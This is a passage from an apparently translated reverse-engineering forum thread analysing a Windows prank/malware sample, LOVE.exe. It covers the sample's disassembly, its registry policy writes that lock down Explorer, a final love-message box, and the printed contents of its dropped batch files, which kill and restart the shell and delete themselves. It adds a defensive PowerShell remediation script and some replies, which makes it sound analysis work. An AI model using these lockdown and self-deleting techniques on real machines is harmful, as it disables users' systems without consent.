D17|.68 6BA24600 push LOVE.0046A26B ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
D1C|.68 01030080 push 0x80000301
D21|.6A 00 push 0x0
D23|.68 03000000 push 0x3
D28|.68 03000000 push 0x3
D2D|.BB 103B4000 mov ebx,LOVE.00403B10
D32|.E8 1C160000 call LOVE.00403353 ;NoRecentDocsMenu = 1: removes the Documents menu
There are many more operations after this, but they are all of the same kind, simple registry writes, so they are not listed one by one. Execution then reaches the following, which is essentially the end:
C9/.55 push ebp
CA|.8BEC mov ebp,esp
CC|.68 04000080 push 0x80000004
D1|.6A 00 push 0x0
D3|.68 9FC44600 push LOVE.0046C49F ;LOVE
D8|.68 01030080 push 0x80000301
DD|.6A 00 push 0x0
DF|.68 00000000 push 0x0
E4|.68 04000080 push 0x80000004
E9|.6A 00 push 0x0
EB|.68 A4C44600 push LOVE.0046C4A4 ;李研我爱你! ("Li Yan, I love you!")
F0|.68 03000000 push 0x3
F5|.BB E03B4000 mov ebx,LOVE.00403BE0
FA|.E8 54000000 call LOVE.00403353 ;at this point it is essentially done: this pops up a message box titled "LOVE" with the text "李研我爱你!" ("Li Yan, I love you!")
FF|.83C4 28 add esp,0x28
|.8BE5 mov esp,ebp
|.5D pop ebp
Supplement:
Contents of the generated del.bat and ddel.bat:
del.bat:
del Aver.exe del.bat ----> deletes Aver.exe and del.bat
del %
ddel.bat:
@echo off
taskkill /f /im expleror.exe ----> force-kills the expleror.exe process, i.e. the desktop shell (written "expleror.exe" in the post; the shell process is explorer.exe)
start expleror.exe ----> restarts it. This is what makes the icon change visible: once it has run, every application's default icon is Aver.ico
del ddel.bat ----> deletes itself
exit
This is my first analysis; there are many places and details I have not covered properly, so please give your advice.
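The thread's closing question is how to undo the damage. The PowerShell script below is an added example written for this page, not code from the original post or from the sample: it checks for every policy value, Run entry, file-association and icon change that the listing above shows the sample writing, reports what it finds and, with -Fix, reverts it. The hive is not visible in the listing, so policy values are looked for in both HKCU and HKLM (an assumption); the restore values for .txt, .inf and exefile\DefaultIcon are the Windows defaults (txtfile, inffile, %1). It also decodes the NoDrives/NoViewOnDrive argument from the two dwords the listing pushes under the 0x80000601 tag, serving both the NoDrives passage in the listing and the remediation question here. The 360Safe settings and the system clock are left to the operator.

```powershell
# Added example, not code from the original post or from the sample.
# Reports (and with -Fix reverts) the registry changes the disassembly above
# shows LOVE.exe making. Run from an elevated PowerShell on the infected account.
param([switch]$Fix)

# Policy values and the Run entry the sample writes (names taken from the listing).
# Windows treats an absent policy value as "no restriction", so the fix is to delete it.
# The hive is not visible in the listing, so both HKCU and HKLM are checked (assumption).
$policyValues = @(
    'Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr',
    'Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu',
    'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled',
    'Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage',
    'Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites',
    'Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting',
    'Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions',
    'Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource',
    'Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu',
    'Software\Microsoft\Windows\CurrentVersion\Run\LOVE.exe'
)

# Values with a meaningful default: these are set back rather than deleted.
$restoreValues = @(
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL'; Name = 'CheckedValue'; Value = 1 },
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3'; Name = '1803'; Value = 0 },
    @{ Path = 'HKLM:\SOFTWARE\Classes\exefile\DefaultIcon'; Name = '(default)'; Value = '%1' },
    @{ Path = 'HKLM:\SOFTWARE\Classes\.txt'; Name = '(default)'; Value = 'txtfile' },
    @{ Path = 'HKLM:\SOFTWARE\Classes\.inf'; Name = '(default)'; Value = 'inffile' }
)

# The listing pushes NoDrives as two dwords under the 0x80000601 (double) tag:
# 0x41EFFFFF high, 0xFFE00000 low. Rebuild the double the way the support library
# reads it and list the drive letters the resulting bitmask hides (bit 0 = A:).
# Parameters are int64 because PowerShell parses 0xFFE00000 as a negative Int32.
function Get-NoDrivesLetters {
    param([int64]$High, [int64]$Low)
    $bits  = (($High -band 4294967295) -shl 32) -bor ($Low -band 4294967295)
    $value = [BitConverter]::Int64BitsToDouble($bits)      # 4294967295.0
    [uint32]$mask = [uint32]$value                           # 0xFFFFFFFF
    $letters = foreach ($i in 0..25) {
        if ($mask -band (1 -shl $i)) { [char](65 + $i) }
    }
    [pscustomobject]@{ Mask = ('0x{0:X8}' -f $mask); Hidden = -join $letters }
}

foreach ($hive in 'HKCU:', 'HKLM:') {
    foreach ($entry in $policyValues) {
        $key  = Join-Path $hive (Split-Path $entry -Parent)
        $name = Split-Path $entry -Leaf
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue
        if ($null -eq $item) { continue }
        Write-Host ("FOUND    {0}\{1} = {2}" -f $key, $name, $item.$name)
        if ($Fix) { Remove-ItemProperty -Path $key -Name $name }
    }
}

foreach ($r in $restoreValues) {
    if (-not (Test-Path $r.Path)) { continue }
    $current = (Get-ItemProperty -Path $r.Path).PSObject.Properties[$r.Name].Value
    if ("$current" -ne "$($r.Value)") {
        Write-Host ("TAMPERED {0}\{1} = '{2}' (expected '{3}')" -f $r.Path, $r.Name, $current, $r.Value)
        if ($Fix) { Set-ItemProperty -Path $r.Path -Name $r.Name -Value $r.Value }
    }
}

# The dropped icon from the file-system section above.
$icon = Join-Path $env:SystemRoot 'System32\Aver.ico'
if (Test-Path $icon) {
    Write-Host "FOUND    dropped icon $icon"
    if ($Fix) { Remove-Item $icon -Force }
}

# Decode the NoDrives argument exactly as it appears in the listing.
Get-NoDrivesLetters -High 0x41EFFFFF -Low 0xFFE00000
```

Run it once without -Fix to see what is set, then with -Fix from an elevated prompt. Afterwards restart explorer.exe (or log off and on) so the shell re-reads the policies, restart or reinstall the antivirus the sample killed, correct the clock, and delete LOVE.exe from the path the Run entry pointed to. The decoder prints Mask 0xFFFFFFFF and Hidden ABCDEFGHIJKLMNOPQRSTUVWXYZ for the values in the listing, which is why no drive is visible anywhere on an infected machine.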
Reply: Very nice, very detailed.

Reply (Sound, 2012-8-4 13:43): No sample?

Reply (Thend), quoting Sound (2012-8-4 13:43): "No sample?"
Er... the sample is on the forum, let me find the link~~~ http://www.52pojie.cn/forum.php?mod=viewthread&tid=156144&extra=page%3D1%26filter%3Dtypeid%26typeid%3D15%26typeid%3D15
That is the link to the sample~ thanks to the brother who provided it.

Reply: Thanks for the approach.

Reply (1354669803, 2012-8-4 13:56): So what is the fix? There is a virus much like this one, with about the same effect: it also disables lots of functions, and then the open action for EXE files becomes "view picture". How should it be dealt with?

Reply (Thend, 2012-8-4 14:02), quoting 1354669803 (2012-8-4 13:56): "So what is the fix? There is a virus much like this one, with about the same effect: it also disables lots of functions, and then the open action for EXE files becomes view pic ..."
For the open-with problem I tried it: you can right-click and choose "Open with". As for a fix, an antivirus tool should be able to remove it... looking for guidance~

Reply (1354669803, 2012-8-4 14:12), quoting Thend (2012-8-4 14:02): "For the open-with problem I tried it: you can right-click and choose Open with. As for a fix, an antivirus tool ..."
The antivirus has already been killed, so how would it run?

Reply (Thend), quoting 1354669803 (2012-8-4 14:12): "The antivirus has already been killed, so how would it run?"
Sweat... can't I just start it again after it is killed? Though I have no antivirus installed in the VM, so I don't know whether it can be restarted~